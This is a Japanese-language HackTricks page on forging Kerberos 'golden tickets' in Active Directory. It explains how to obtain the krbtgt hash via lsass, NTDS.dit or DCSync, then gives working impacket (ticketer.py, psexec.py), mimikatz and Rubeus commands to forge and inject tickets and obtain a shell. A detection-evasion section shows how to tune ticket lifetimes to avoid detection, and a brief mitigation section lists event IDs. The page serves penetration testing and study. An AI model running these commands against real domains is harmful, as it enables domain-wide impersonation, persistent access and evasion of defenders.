hacktricks/windows-hardening/active-directory-methodology/golden-ticket.md

ゴールデンチケット

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！

• The PEASS Familyを見つけてください。独占的なNFTのコレクションです。

• 公式のPEASS＆HackTricksのグッズを手に入れましょう。

• 💬 Discordグループまたはtelegramグループに参加するか、Twitterで🐦@carlospolopmをフォローしてください。

• **ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。

ゴールデンチケット

有効なTGTは任意のユーザーとして作成することができます。これには、krbtgt ADアカウントのNTLMハッシュを使用します。TGSではなくTGTを偽造する利点は、ドメイン内の任意のサービス（またはマシン）となり、なりすまされたユーザーにアクセスできることです。
さらに、krbtgtの資格情報は自動的には変更されません。

krbtgtアカウントのNTLMハッシュは、ドメイン内の任意のDCのlsassプロセスまたはNTDS.ditファイルから取得できます。また、Mimikatzのlsadump::dcsyncモジュールやimpacketの例であるsecretsdump.pyを使用したDCsync攻撃でも、そのNTLMを取得することができます。どのテクニックを使用しても、通常はドメイン管理者特権または同等の特権が必要です。

また、AES Kerberosキー（AES128およびAES256）を使用してチケットを偽造することが可能であり、好ましい（opsec）です。

{% code title="Linuxから" %}

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

{% code title="Windowsから" %}

#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

{% endcode %}

ゴールデンチケットを注入した後、共有ファイル（C$）にアクセスしたり、サービスやWMIを実行したりすることができます。そのため、psexecまたはwmiexecを使用してシェルを取得することができます（winrmを介してシェルを取得することはできないようです）。

一般的な検出の回避

ゴールデンチケットを検出する最も一般的な方法は、ワイヤ上のKerberosトラフィックを検査することです。デフォルトでは、MimikatzはTGTを10年間署名します。そのため、それを使用して行われる後続のTGSリクエストでは異常として目立つでしょう。

Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM

/startoffset、/endin、/renewmaxパラメータを使用して、開始オフセット、期間、および最大更新回数を制御します（すべて分単位）。

Get-DomainPolicy | select -expand KerberosPolicy

残念ながら、TGTの寿命は4769のログに記録されていないため、Windowsイベントログにはこの情報はありません。ただし、事前の4768なしに4769を見ることができることを関連付けることができます。TGTなしでTGSを要求することはできず、TGTの発行記録がない場合、オフラインで偽造されたことを推測することができます。

この検出をバイパスするために、ダイヤモンドチケットをチェックしてください：

{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}

緩和策

• 4624：アカウントログオン
• 4672：管理者ログオン
• Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property

防御側が行える他の小技は、デフォルトのドメイン管理者アカウントなどの敏感なユーザーの4769にアラートを設定することです。

ired.teamのGolden Ticketに関する詳細情報

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！

• The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。

• 公式のPEASS＆HackTricksのグッズを手に入れましょう。

• 💬 Discordグループに参加するか、telegramグループに参加するか、Twitterでフォローする🐦@carlospolopm。

• **ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。